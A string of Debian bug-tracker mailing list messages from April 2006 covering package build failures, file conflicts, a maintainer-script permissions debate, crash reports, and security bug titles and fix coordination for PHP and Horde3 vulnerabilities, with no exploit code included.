Processing commands for [EMAIL PROTECTED]: severity 361915 important Bug#361915: copy() Safe Mode Bypass PHP 4.4.2 and 5.1.2 Severity set to `important'. severity 361917 important Bug#361917: function *() php/apache Crash PHP 4.4.2 and 5.1.2 Severity set to `important'. severity 361916 important Bug#361916: tempnam() open_basedir bypass PHP 4.4.2 and 5.1.2 Severity set to `important'. found 361853 4:4.4.2-1 Bug#361853: phpinfo() Cross Site Scripting PHP 5.1.2 and 4.4.2 Bug marked as found in version 4:4.4.2-1. found 361854 4:4.4.2-1 Bug#361854: function *() php/apache Crash PHP 4.4.2 and 5.1.2 Bug marked as found in version 4:4.4.2-1. found 361855 4:4.4.2-1 Bug#361855: tempnam() open_basedir bypass PHP 4.4.2 and 5.1.2 Bug marked as found in version 4:4.4.2-1. found 361856 4:4.4.2-1 Bug#361856: copy() Safe Mode Bypass PHP 4.4.2 and 5.1.2 Bug marked as found in version 4:4.4.2-1. thanks Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#361943: ipe: FTBFS (amd64): format '%d' expects type 'int', but argument 3 has type 'size_t'
Hey Folks, Thanks for your interest in Ipe. On Tue, Apr 11, 2006 at 01:00:08PM +0100, Stephen Gran wrote: C99 has introduced the prefix z for size_t, so this should really be written as: + The document contains %zd pages, cannot convert page %d.\n, doc-size(), pageNum); Andreas, can you confirm that this works for you? Bastian Blank had previously pointed out %z to me (BTS #361773). I uploaded revision -3 last night that uses %zu in two places. I wonder if you could try building that version and see if there are any printf()s that I have overlooked. Thanks, -Steve -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#309670: marked as done (gabber: FTBFS: Missing build dependency.)
Your message dated Tue, 11 Apr 2006 10:59:45 -0300 with message-id [EMAIL PROTECTED] and subject line The failing package doesn't exist anymore has caused the attached Bug report to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what I am talking about this indicates a serious mail system misconfiguration somewhere. Please contact me immediately.) Debian bug tracking system administrator (administrator, Debian Bugs database) ---BeginMessage--- Package: gabber Version: 1.9.4-1 Severity: serious Tags: experimental Hi, Gabber is failing to build in experimental with the following error: checking for intltool = 0.23... 0.30 found checking for perl... /usr/bin/perl configure: error: XML::Parser perl module is required for intltool make: *** [config.status] Error 1 Adding a bulid dependency on libxml-parser-perl could fix this. Kurt ---End Message--- ---BeginMessage--- This bug existed in a version of the gabber package which was present in experimental. It was removed from experimental, so I'm closing this bug. -- Goedson Teixeira Paixao [EMAIL PROTECTED] signature.asc Description: Esta é uma parte de mensagem assinada digitalmente ---End Message---
Bug#333906: marked as done (apt-get build-dep fails due to glademm transition)
Your message dated Tue, 11 Apr 2006 11:08:16 -0300 with message-id [EMAIL PROTECTED] and subject line Buggy package was removed has caused the attached Bug report to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what I am talking about this indicates a serious mail system misconfiguration somewhere. Please contact me immediately.) Debian bug tracking system administrator (administrator, Debian Bugs database) ---BeginMessage--- -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Package: gabber Severity: serious Version: 0.8.8-5 Hi Please update your build dependency on libglademm2.0-dev to libglademm2.4-dev Cheers Luk - -- Luk Claes - http://people.debian.org/~luk - GPG key 1024D/9B7C328D Fingerprint: D5AF 25FB 316B 53BB 08E7 F999 E544 DE07 9B7C 328D -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2 (GNU/Linux) iD8DBQFDT5kh5UTeB5t8Mo0RAmsJAJ4/gqtIvrLVI3wqQh694+HihcmZFgCggq0a Q7Zhi+TMHdq5xTXhBNpvtWo= =mIUC -END PGP SIGNATURE- ---End Message--- ---BeginMessage--- This bug was only present on a version of the package existent in experimental. It is not present anymore, so I'm closing this bug. -- Goedson Teixeira Paixao [EMAIL PROTECTED] signature.asc Description: Esta é uma parte de mensagem assinada digitalmente ---End Message---
Bug#361967: Horde3 Critical Vunerability
Package: horde3Version: 3.0.9-3Severity: critical "Horde is prone to a remote PHP code-execution vulnerability. An attacker can exploit this issue to execute arbitrary malicious PHP code and in the context of the webserver process. This may help the attacker compromise the application and the underlying system; other attacks are also possible. Horde versions 3.0 up to 3.0.9 and 3.1.0 are vulnerable; other versions may also be affected." See:http://www.securityfocus.com/bid/17292/info Pedro MüllerSecurity Officer
Bug#361903: marked as done (policycoreutils - FTBFS: error: 'SEMANAGE_CAN_READ' undeclared)
Your message dated Tue, 11 Apr 2006 07:32:05 -0700 with message-id [EMAIL PROTECTED] and subject line Bug#361903: fixed in policycoreutils 1.30-2 has caused the attached Bug report to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what I am talking about this indicates a serious mail system misconfiguration somewhere. Please contact me immediately.) Debian bug tracking system administrator (administrator, Debian Bugs database) ---BeginMessage--- Package: policycoreutils Version: 1.30-1 Severity: serious There was an error while trying to autobuild your package: Automatic build of policycoreutils_1.30-1 on debian01 by sbuild/s390 85 [...] make[2]: Entering directory `/build/buildd/policycoreutils-1.30/semodule' cc -O2 -g -I/usr/include -c -o semodule.o semodule.c semodule.c: In function 'main': semodule.c:248: error: 'SEMANAGE_CAN_READ' undeclared (first use in this function) semodule.c:248: error: (Each undeclared identifier is reported only once semodule.c:248: error: for each function it appears in.) make[2]: *** [semodule.o] Error 1 make[2]: Leaving directory `/build/buildd/policycoreutils-1.30/semodule' make[1]: *** [all] Error 1 make[1]: Leaving directory `/build/buildd/policycoreutils-1.30' make: *** [build/policycoreutils] Error 2 ** Build finished at 20060410-2324 FAILED [dpkg-buildpackage died] ---End Message--- ---BeginMessage--- Source: policycoreutils Source-Version: 1.30-2 We believe that the bug you reported is fixed in the latest version of policycoreutils, which is due to be installed in the Debian FTP archive: policycoreutils_1.30-2.diff.gz to pool/main/p/policycoreutils/policycoreutils_1.30-2.diff.gz policycoreutils_1.30-2.dsc to pool/main/p/policycoreutils/policycoreutils_1.30-2.dsc policycoreutils_1.30-2_i386.deb to pool/main/p/policycoreutils/policycoreutils_1.30-2_i386.deb A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to [EMAIL PROTECTED], and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Manoj Srivastava [EMAIL PROTECTED] (supplier of updated policycoreutils package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing [EMAIL PROTECTED]) -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Format: 1.7 Date: Tue, 11 Apr 2006 09:07:42 -0500 Source: policycoreutils Binary: policycoreutils Architecture: source i386 Version: 1.30-2 Distribution: unstable Urgency: low Maintainer: Manoj Srivastava [EMAIL PROTECTED] Changed-By: Manoj Srivastava [EMAIL PROTECTED] Description: policycoreutils - SELinux core policy utilities Closes: 361903 Changes: policycoreutils (1.30-2) unstable; urgency=low . * Bug fix: policycoreutils - FTBFS: error: 'SEMANAGE_CAN_READ' undeclared, thanks to Bastian Blank. Tighten dependency on libsemanage1-dev(Closes: #361903). Files: 6ab4356366010c0cdbb262dd759f6a36 683 utils optional policycoreutils_1.30-2.dsc 22abe1cd390c63b1e57c4e7218e2 46038 utils optional policycoreutils_1.30-2.diff.gz 916275783d47bf28890e3ff612038928 166440 utils optional policycoreutils_1.30-2_i386.deb -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.3 (GNU/Linux) iD8DBQFEO7p+Ibrau78kQkwRAnfGAJ4toWXVOKA6IyEyd66bIAuMRZny9QCeI7/V 2naLjaPIyC45qduYS6IvzyE= =qstR -END PGP SIGNATURE- ---End Message---
Bug#361958: marked as done (modutils conflicts with manpages-dev. see Bug #360843)
Your message dated Tue, 11 Apr 2006 10:05:49 -0400 with message-id [EMAIL PROTECTED] and subject line Invalid has caused the attached Bug report to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what I am talking about this indicates a serious mail system misconfiguration somewhere. Please contact me immediately.) Debian bug tracking system administrator (administrator, Debian Bugs database) ---BeginMessage--- Package: modutils Version: 2.4.27.0-5 Severity: critical Justification: breaks unrelated software Unpacking replacement manpages-dev ... dpkg: error processing /var/cache/apt/archives/manpages-dev_2.25-2_all.deb (--unpack): trying to overwrite `/usr/share/man/man2/create_module.2.gz', which is also in package modutils dpkg-deb: subprocess paste killed by signal (Broken pipe) Errors were encountered while processing: /var/cache/apt/archives/manpages-dev_2.25-2_all.deb E: Sub-process /usr/bin/dpkg returned an error code (1) -- System Information: Debian Release: testing/unstable APT prefers unstable APT policy: (500, 'unstable') Architecture: i386 (i686) Shell: /bin/sh linked to /bin/bash Kernel: Linux 2.6.16 Locale: LANG=hu_HU, LC_CTYPE=hu_HU (charmap=ISO-8859-2) Versions of packages modutils depends on: ii libc62.3.6-5 GNU C Library: Shared libraries an ii sysvinit 2.86.ds1-14 System-V-like init utilities modutils recommends no packages. -- no debconf information ---End Message--- ---BeginMessage--- Hi, this is a manpages-dev bug. ---End Message---
Processed: found 360843 in 2.25-2
Processing commands for [EMAIL PROTECTED]: found 360843 2.25-2 Bug#360843: manpages-dev tries to overwrite files from modutils (create_module.2.gz) Bug#361084: package manpages-dev in unstable is broken Bug#361369: conflicting files with modutils Bug marked as found in version 2.25-2. End of message, stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#361956: [Pkg-nagios-devel] Bug#361956: nagios2-common: postinstall script uses unconditional chmod/chown, breaking any dpkg-statoverride
On Tue, Apr 11, 2006 at 02:35:09PM +0200, Heiko Schlittermann wrote: As stated in the subject -- the postinstall uses unconditionally chmod/chown. If the local admin tries to change permissions using dpkg-statoverride, these local changes are not respected. +# useful functions +setperm() { +local user=$1; shift +local group=$1; shift +local mode=$1; shift +local file=$1; shift +dpkg-statoverride --list $file /dev/null return 0 +dpkg-statoverride --update --add $user $group $mode $file +} The maintainer script adding the statoverride does not seem to be policy compliant to me. We are not to touch the dpkg-statoverride database. For exim4, we have solved this with the following code: # honor dpkg-statoverride settings for files not managed with dpkg for pat in /var/\*/exim4 /var/\*/exim4/\*; do [ $EX4DEBUG ] eval echo evaluate statoverride $pat eval dpkg-statoverride --list $pat | while read USER GROUP MODE FILE; do [ $EX4DEBUG ] echo statoverride $USER $GROUP $MODE $FILE chown ${USER}:${GROUP} $FILE chmod $MODE $FILE done done I don't particularly like the way this is implemented, though. Comments? Greetings Marc -- - Marc Haber | I don't trust Computers. They | Mailadresse im Header Mannheim, Germany | lose things.Winona Ryder | Fon: *49 621 72739834 Nordisch by Nature | How to make an American Quilt | Fax: *49 621 72739835 -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Processed: Horde3 Vulnerability: CVE-2006-1491 remote arbitrary command execution
Processing commands for [EMAIL PROTECTED]: tags 361967 +etch sarge security Bug#361967: Horde3 Critical Vunerability There were no tags set. Tags added: etch, sarge, security thanks Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#361976: nant: incorrect clilibs control file leading to broken dependencies
Package: nant Version: 0.84+0.85-rc3-8 Severity: serious Hi, currently the clilibs control file of nant lists all kinds of libraries: NDoc.Core 1.3.1851.0__b9896512f28c0f09 nant (= 0.84+0.85) NDoc.Documenter.Msdn 1.3.1851.0__b9896512f28c0f09 nant (= 0.84+0.85) NDoc.ExtendedUI 1.3.1851.0__b9896512f28c0f09 nant (= 0.84+0.85) nunit.framework 2.2.0.0__96d09a1eb7f44a77 nant (= 0.84+0.85) nunit.core 2.2.0.0__96d09a1eb7f44a77 nant (= 0.84+0.85) NUnitCore 1.11.786.40392__1fd1558aebfb1c04 nant (= 0.84+0.85) ICSharpCode.SharpZipLib 0.83.1.0__1b03e6acf1164f73 nant (= 0.84+0.85) log4net 1.2.1.40796__aaa0f432407c68df nant (= 0.84+0.85) These are, although they're shipped by nant, not meant to be used by external programs and (more important) are not installed into the GAC at all. nant simply shouldn't call dh_makeclilibs. This wrong clilibs file for example gets one a nant Depends on packages that link to nunit.core.dll instead of the correct libnunit-cil Depends and leads to a missing assembly in the GAC which results in an application crash. Bye -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#361956: [Pkg-nagios-devel] Bug#361956: nagios2-common: postinstall script uses unconditional chmod/chown, breaking any dpkg-statoverride
Marc Haber [EMAIL PROTECTED] (Di 11 Apr 2006 16:16:53 CEST): On Tue, Apr 11, 2006 at 02:35:09PM +0200, Heiko Schlittermann wrote: As stated in the subject -- the postinstall uses unconditionally chmod/chown. If the local admin tries to change permissions using dpkg-statoverride, these local changes are not respected. +# useful functions +setperm() { +local user=$1; shift +local group=$1; shift +local mode=$1; shift +local file=$1; shift +dpkg-statoverride --list $file /dev/null return 0 +dpkg-statoverride --update --add $user $group $mode $file +} The maintainer script adding the statoverride does not seem to be policy compliant to me. We are not to touch the dpkg-statoverride database. What about the policy manual 10.9.1? Given the above, dpkg-statoverride is essentially a tool for system administrators and would not normally be needed in the maintainer scripts. There is one type of situation, though, where calls to dpkg-statoverride would be needed in the maintainer scripts, and that involves packages which use dynamically allocated user or group ids. In such a situation, something like the following idiom can be very helpful in the package's postinst, where sysuser is a dynamically allocated id: Of course, both (not touching the statoverride data base - and - using statoverride for fixing the permissions) have their pro con. Pro using statoverride: o it's clean interface o admin is able to see all permissions different from root:root 0755/0644 o easy way to recover lost permissions of packaged files Contra: o probably huge data base of statoverrides o more steps for admin to change the permissions of statoverridden files (as statoverride only changes the permissions during '--add', and the files are added already during package installation) (May be a new version of statoverride could solve it: dpkg-statoverride --update --list pattern) Best regards from Dresden Viele Grüße aus Dresden Heiko Schlittermann -- SCHLITTERMANN.de internet unix support - Heiko Schlittermann HS12-RIPE - gnupg encrypted messages are welcome - key ID: 48D0359B --- gnupg fingerprint: 3061 CFBF 2D88 F034 E8D2 7E92 EE4E AC98 48D0 359B - signature.asc Description: Digital signature
Bug#361967: Horde3 Vulnerability: CVE-2006-1491 remote arbitrary command execution
tags 361967 +etch sarge security thanks On Tue, Apr 11, 2006 at 10:46:07AM -0300, Pedro Müller wrote: See this: http://www.securityfocus.com/bid/17292/info Please, fix this or update to 3.0.10. An update has been submitted to the security team; I suppose they are going to release a security advisory and put the said update on the archive on security.debian.org anytime now. If you wish to use the update we prepared before it is approved by the security team, you can take it from http://people.debian.org/~lmamane/horde/ . (That update is for Debian stable 3.1 sarge. Debian unstable sid is already fixed. Debian testing etch (the beta version of Debian 3.2) is going to get the update automatically in a few days. If you are running Debian testing etch, you can install the horde3 / imp4 / turba2 / ... packages from unstable sid. The secure testing team might want to consider pushing turba2 2.1-1 to etch prematurely, as it is blocking horde3 3.1.1-1 (the version that fixes this) to migrate to testing. This is critical! Yes, it is. -- Lionel -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#361977: evolution: [composer] crashes on line-wrap
Package: evolution Version: 2.4.2.1-1 Severity: grave Justification: renders package unusable Hello, When typing a message into the Evolution composer, which carries out automatic line-wrapping, the entire application freezes when the first line-wrap would have been carried out. The only way to close evolution is to ``Force Quit'' or kill the process manually. The only work-around is to type the message in another editor, then paste it into Evolution with automatic line-wrapping turned off. It happened after a very recent upgrade, on two different Etch machines that I have access to. best regards, Matthew -- System Information: Debian Release: testing/unstable APT prefers testing APT policy: (900, 'testing') Architecture: i386 (i686) Shell: /bin/sh linked to /bin/bash Kernel: Linux 2.6.12-1-686 Locale: LANG=en_GB, LC_CTYPE=en_GB (charmap=ISO-8859-1) Versions of packages evolution depends on: ii evolution-dat 1.4.2.1-1 evolution database backend server ii gconf22.14.0-1 GNOME configuration database syste ii gnome-icon-th 2.12.1-2 GNOME Desktop icon theme ii gtkhtml3.83.8.1-1HTML rendering/editing library - b ii libart-2.0-2 2.3.17-1 Library of functions for 2D graphi ii libatk1.0-0 1.11.3-1 The ATK accessibility toolkit ii libaudiofile0 0.2.6-6Open-source version of SGI's audio ii libbonobo2-0 2.14.0-1 Bonobo CORBA interfaces library ii libbonoboui2- 2.10.1-2 The Bonobo UI library ii libc6 2.3.6-3GNU C Library: Shared libraries an ii libcairo2 1.0.2-3The Cairo 2D vector graphics libra ii libcamel1.2-6 1.4.2.1-1 The Evolution MIME message handlin ii libcomerr21.38+1.39-WIP-2005.12.31-1 common error description library ii libcompfaceg1 1:1.5.2-3 Compress/decompress images for mai ii libdb4.2 4.2.52-23.1Berkeley v4.2 Database Libraries [ ii libebook1.2-5 1.4.2.1-1 Client library for evolution addre ii libecal1.2-3 1.4.2.1-1 Client library for evolution calen ii libedataserve 1.4.2.1-1 Utility library for evolution data ii libedataserve 1.4.2.1-1 GUI utility library for evolution ii libesd0 0.2.36-3 Enlightened Sound Daemon - Shared ii libfontconfig 2.3.2-1.1 generic font configuration library ii libfreetype6 2.1.10-1 FreeType 2 font engine, shared lib ii libgail-commo 1.8.11-1 GNOME Accessibility Implementation ii libgail17 1.8.11-1 GNOME Accessibility Implementation ii libgconf2-4 2.14.0-1 GNOME configuration database syste ii libgcrypt11 1.2.2-1LGPL Crypto library - runtime libr ii libglade2-0 1:2.5.1-2 library to load .glade files at ru ii libglib2.0-0 2.10.1-2 The GLib library of C routines ii libgnome-keyr 0.4.9-1GNOME keyring services library ii libgnome-pilo 2.0.12-1.4 Support libraries for gnome-pilot ii libgnome2-0 2.12.0.1-5 The GNOME 2 library - runtime file ii libgnomecanva 2.14.0-1 A powerful object-oriented display ii libgnomeprint 2.12.1-3 The GNOME 2.2 print architecture - ii libgnomeprint 2.12.1-2 GNOME 2.2 print architecture User ii libgnomeui-0 2.12.1-1 The GNOME 2 libraries (User Interf ii libgnomevfs2- 2.12.2-5 GNOME virtual file-system (runtime ii libgnutls11 1.0.16-14 GNU TLS library - runtime library ii libgpg-error0 1.2-1 library for common error values an ii libgtk2.0-0 2.8.16-1 The GTK+ graphical user interface ii libgtkhtml3.8 3.8.1-1HTML rendering/editing library - r ii libice6 6.9.0.dfsg.1-6 Inter-Client Exchange library ii libjpeg62 6b-12 The Independent JPEG Group's JPEG ii libkrb53 1.4.3-6MIT Kerberos runtime libraries ii libldap2 2.1.30-13 OpenLDAP libraries ii libnspr4 2:1.7.12-1.1 Netscape Portable Runtime Library ii libnss3 2:1.7.12-1.1 Network Security Service Libraries ii liborbit2 1:2.14.0-1 libraries for ORBit2 - a CORBA ORB ii libpango1.0-0 1.12.0-2 Layout and rendering of internatio ii libpisock80.11.8-21 Library for communicating with a P ii libpisync00.11.8-21 Synchronization library for PalmOS ii libpng12-01.2.8rel-5 PNG library - runtime ii libpopt0 1.7-5 lib for parsing cmdline parameters
Bug#361984: pgpool: postinst failure (No such file or directory)
Package: pgpool Version: 3.0.1-1 Severity: grave Justification: renders package unusable Hi, here is the problem: Setting up pgpool (3.0.1-1) ... Starting pgpool: pgpool-su: /usr/sbin/pgpool -n 21 /dev/null | logger -t pgpool -p local0.info /dev/null 21 : No such file or directory failed! invoke-rc.d: initscript pgpool, action start failed. dpkg: error processing pgpool (--configure): subprocess post-installation script returned error exit status 127 You should use su -c. -- System Information: Debian Release: testing/unstable APT prefers unstable APT policy: (100, 'unstable'), (99, 'experimental') Architecture: i386 (i686) Shell: /bin/sh linked to /bin/bash Kernel: Linux 2.6.16-1-686 Locale: [EMAIL PROTECTED], [EMAIL PROTECTED] (charmap=ISO-8859-15) Versions of packages pgpool depends on: ii libc6 2.3.6-5GNU C Library: Shared libraries an ii lsb-base 3.1-2 Linux Standard Base 3.1 init scrip ii postgresql-common 49 manager for PostgreSQL database cl pgpool recommends no packages. -- no debconf information -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#361919: marked as done (exim4: Dropping all hosts with ignore_target_hosts results in host lookup did not complete)
Your message dated Tue, 11 Apr 2006 08:47:09 -0700 with message-id [EMAIL PROTECTED] and subject line Bug#361919: fixed in exim4 4.50-8sarge2 has caused the attached Bug report to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what I am talking about this indicates a serious mail system misconfiguration somewhere. Please contact me immediately.) Debian bug tracking system administrator (administrator, Debian Bugs database) ---BeginMessage--- Package: exim4 Version: 4.60-4 Severity: normal The following routers for remote domains (the reason for this configuration is left as an excercise to the reader) --8-- lookuphost: driver = dnslookup domains = ! +local_domains ignore_target_hosts = ! /0 : ! 85.194.0.0/18 : ! 212.214.126.0/24 : ! 85.8.0.0/20 same_domain_copy_routing transport = remote_smtp smarthost: driver = manualroute domains = ! +local_domains transport = remote_smtp route_list = * smtpserver.stunet.se:mail.visit.se no_more --8-- give the following (partial) output for exim4 -d -bt [EMAIL PROTECTED]: --8-- lookuphost router local_part=holmgren domain=lysator.liu.se checking domains lysator.liu.se in @ : ittma-hohah : localhost : kibibyte.se : mail.kibibyte.se? no (end of list) lysator.liu.se in ! +local_domains? yes (end of list) calling lookuphost router lookuphost router called for [EMAIL PROTECTED] domain = lysator.liu.se DNS lookup of lysator.liu.se (MX) succeeded DNS lookup of mail.lysator.liu.se () gave NO_DATA returning DNS_NODATA DNS lookup of mail.lysator.liu.se (A) succeeded 130.236.254.3 in ! /0 : ! 85.194.0.0/18 : ! 212.214.126.0/24 : ! 85.8.0.0/20? yes (end of list) ignored host mail.lysator.liu.se [130.236.254.3] mail.lysator.liu.se in hosts_treat_as_local? no (end of list) fully qualified name = lysator.liu.se host_find_bydns yield = HOST_FIND_AGAIN (1); returned hosts: mail.lysator.liu.se null MX=10 * lookuphost router: defer for [EMAIL PROTECTED] message: host lookup did not complete [EMAIL PROTECTED] cannot be resolved at this time: host lookup did not complete search_tidyup called --8-- As you can see, there is no hint of DNS problems, so the HOST_FIND_AGAIN is very strange. After downgrading to 4.60-1, the problem went away. I suspect this might be caused by the fix to bug #342619. More investigation to come... -- System Information: Debian Release: testing/unstable APT prefers testing APT policy: (990, 'testing'), (500, 'stable'), (90, 'unstable'), (10, 'experimental') Architecture: i386 (i686) Shell: /bin/sh linked to /bin/bash Kernel: Linux 2.6.15-ittmahohah1 Locale: LANG=sv_SE.UTF-8, LC_CTYPE=sv_SE.UTF-8 (charmap=UTF-8) ---End Message--- ---BeginMessage--- Source: exim4 Source-Version: 4.50-8sarge2 We believe that the bug you reported is fixed in the latest version of exim4, which is due to be installed in the Debian FTP archive: exim4-base_4.50-8sarge2_i386.deb to pool/main/e/exim4/exim4-base_4.50-8sarge2_i386.deb exim4-config_4.50-8sarge2_all.deb to pool/main/e/exim4/exim4-config_4.50-8sarge2_all.deb exim4-daemon-heavy_4.50-8sarge2_i386.deb to pool/main/e/exim4/exim4-daemon-heavy_4.50-8sarge2_i386.deb exim4-daemon-light_4.50-8sarge2_i386.deb to pool/main/e/exim4/exim4-daemon-light_4.50-8sarge2_i386.deb exim4_4.50-8sarge2.diff.gz to pool/main/e/exim4/exim4_4.50-8sarge2.diff.gz exim4_4.50-8sarge2.dsc to pool/main/e/exim4/exim4_4.50-8sarge2.dsc exim4_4.50-8sarge2_all.deb to pool/main/e/exim4/exim4_4.50-8sarge2_all.deb eximon4_4.50-8sarge2_i386.deb to pool/main/e/exim4/eximon4_4.50-8sarge2_i386.deb A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to [EMAIL PROTECTED], and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Marc Haber [EMAIL PROTECTED] (supplier of updated exim4 package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing [EMAIL PROTECTED]) -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Format: 1.7 Date: Tue, 11 Apr 2006 12:23:25 + Source: exim4 Binary: eximon4 exim4-daemon-custom exim4-daemon-heavy exim4-base exim4 exim4-daemon-light exim4-config Architecture: source i386 all Version: 4.50-8sarge2 Distribution: stable Urgency: low Maintainer: Exim4 Maintainers [EMAIL PROTECTED] Changed-By: Marc Haber [EMAIL PROTECTED] Description: exim4
Bug#360379: Fixed in 2.3.11
This issue was fixed in January 2006, release 2.3.11. It's about a symbol that got deprecated in gnome libs. Pawel
Processed: #361227: firebird2: debian/rules clean leaves generated files
Processing commands for [EMAIL PROTECTED]: tags 361227 pending Bug#361227: firebird2: debian/rules clean leaves generated files There were no tags set. Tags added: pending thanks Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#361976: marked as done (nant: incorrect clilibs control file leading to broken dependencies)
Your message dated Tue, 11 Apr 2006 09:32:09 -0700 with message-id [EMAIL PROTECTED] and subject line Bug#361976: fixed in nant 0.84+0.85-rc3-10 has caused the attached Bug report to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what I am talking about this indicates a serious mail system misconfiguration somewhere. Please contact me immediately.) Debian bug tracking system administrator (administrator, Debian Bugs database) ---BeginMessage--- Package: nant Version: 0.84+0.85-rc3-8 Severity: serious Hi, currently the clilibs control file of nant lists all kinds of libraries: NDoc.Core 1.3.1851.0__b9896512f28c0f09 nant (= 0.84+0.85) NDoc.Documenter.Msdn 1.3.1851.0__b9896512f28c0f09 nant (= 0.84+0.85) NDoc.ExtendedUI 1.3.1851.0__b9896512f28c0f09 nant (= 0.84+0.85) nunit.framework 2.2.0.0__96d09a1eb7f44a77 nant (= 0.84+0.85) nunit.core 2.2.0.0__96d09a1eb7f44a77 nant (= 0.84+0.85) NUnitCore 1.11.786.40392__1fd1558aebfb1c04 nant (= 0.84+0.85) ICSharpCode.SharpZipLib 0.83.1.0__1b03e6acf1164f73 nant (= 0.84+0.85) log4net 1.2.1.40796__aaa0f432407c68df nant (= 0.84+0.85) These are, although they're shipped by nant, not meant to be used by external programs and (more important) are not installed into the GAC at all. nant simply shouldn't call dh_makeclilibs. This wrong clilibs file for example gets one a nant Depends on packages that link to nunit.core.dll instead of the correct libnunit-cil Depends and leads to a missing assembly in the GAC which results in an application crash. Bye ---End Message--- ---BeginMessage--- Source: nant Source-Version: 0.84+0.85-rc3-10 We believe that the bug you reported is fixed in the latest version of nant, which is due to be installed in the Debian FTP archive: nant_0.84+0.85-rc3-10.diff.gz to pool/main/n/nant/nant_0.84+0.85-rc3-10.diff.gz nant_0.84+0.85-rc3-10.dsc to pool/main/n/nant/nant_0.84+0.85-rc3-10.dsc nant_0.84+0.85-rc3-10_all.deb to pool/main/n/nant/nant_0.84+0.85-rc3-10_all.deb A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to [EMAIL PROTECTED], and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Dave Beckett [EMAIL PROTECTED] (supplier of updated nant package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing [EMAIL PROTECTED]) -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Format: 1.7 Date: Tue, 11 Apr 2006 09:09:30 -0700 Source: nant Binary: nant Architecture: source all Version: 0.84+0.85-rc3-10 Distribution: unstable Urgency: low Maintainer: Dave Beckett [EMAIL PROTECTED] Changed-By: Dave Beckett [EMAIL PROTECTED] Description: nant - .NET build tool similar to Ant Closes: 361976 Changes: nant (0.84+0.85-rc3-10) unstable; urgency=low . * Remove call to dh_makeclilibs since nant has no public GAC installed libraries (Closes: 361976) Files: 0bc21d0c7fb3a467f201f8f97c679db7 700 devel optional nant_0.84+0.85-rc3-10.dsc 4d57459e7f1c90231893a29449d5bd83 10162 devel optional nant_0.84+0.85-rc3-10.diff.gz acd3fad6ea35ef09d3e93e5ba649a150 1998712 devel optional nant_0.84+0.85-rc3-10_all.deb -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.3 (GNU/Linux) iD8DBQFEO9WEQ+ySUE9xlVoRAi4zAJ48bepFAFvcVif1OGprOlLyFP0uQQCfZYrt iFHQLBsS6jxEla18sHi95iA= =xKgy -END PGP SIGNATURE- ---End Message---
Bug#300270: updated patch / bug #300270 status
* Paul Melnikow [EMAIL PROTECTED] [2006-04-03 15:41]: please go ahead -- thank you. sorry i can't be more helpful right now. OK, I'll sponsor Joost's NMU in the next few days. -- Martin Michlmayr http://www.cyrius.com/ -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Processed: Do not close, but reassign and merge
